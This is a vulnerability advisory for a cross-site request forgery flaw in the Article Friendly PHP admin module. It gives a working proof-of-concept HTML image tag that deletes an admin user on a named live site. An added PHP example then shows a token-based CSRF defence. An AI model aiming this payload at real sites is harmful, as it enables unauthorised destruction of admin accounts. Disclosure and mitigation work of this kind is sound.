Article Friendly suffers from a cross-site request forgery vulnerability.
=======================================================================
Article friendly CSRF Vulnerability
=======================================================================
by
Pratul Agrawal
# Vulnerability found in: Admin module
# Email: Pratulag@yahoo.com
# Company: aksitservices
# Credit: Pratul Agrawal
# Site page: http://www.articlefriendly.com/
# Platform: PHP
# Proof of concept #
Targeted URL: http://www.familyfriendsphotos.com/admin/index.php?filename=adminlogin
Script to delete the Admin user through Cross Site request forgery
. ..................................................................................................................
<html>
<body>
<img src=http://www.familyfriendsphotos.com/admin/index.php?filename=adminuser&a=3&adminid=[USER ID] />
</body>
</html>
. ..................................................................................................................
After execution, refresh the page and you can see that the user with the given ID has been deleted automatically.
#If you have any questions, comments, or concerns, feel free to contact me.
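
One way to guard a state-changing admin action like the delete request above (an added example, not part of the original advisory and not Article Friendly's code): refuse GET for the action and require a per-session token that a cross-site page cannot read. The function names, the `csrf_token` field name and the sample requests are assumptions constructed for illustration.

```php
<?php
// Added example: hypothetical guard for a state-changing admin action.
// csrf_token() and guard_admin_action() are assumed names, not the product's API.
declare(strict_types=1);

function csrf_token(array &$session): string
{
    // One random token per session, embedded as a hidden field in every admin form.
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function guard_admin_action(string $method, array $post, array $session): array
{
    // An <img> tag can only issue GET, so destructive actions must refuse it.
    if ($method !== 'POST') {
        return [405, 'state-changing actions require POST'];
    }
    $sent = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    // hash_equals compares in constant time; an unset session token never matches.
    if (!is_string($sent) || $expected === '' || !hash_equals($expected, $sent)) {
        return [403, 'missing or invalid CSRF token'];
    }
    return [200, 'ok'];
}

// Constructed sample requests; runs offline from the PHP CLI.
$session = [];
$token = csrf_token($session);

$cases = [
    'cross-site GET (image tag)'   => ['GET',  []],
    'cross-site POST, no token'    => ['POST', ['adminid' => '1']],
    'admin form POST, valid token' => ['POST', ['adminid' => '1', 'csrf_token' => $token]],
];
foreach ($cases as $label => [$method, $post]) {
    [$status, $reason] = guard_admin_action($method, $post, $session);
    printf("%-30s -> %d %s\n", $label, $status, $reason);
}
```

In a real handler the guard would be called with `$_SERVER['REQUEST_METHOD']`, `$_POST` and `$_SESSION` before the delete is performed.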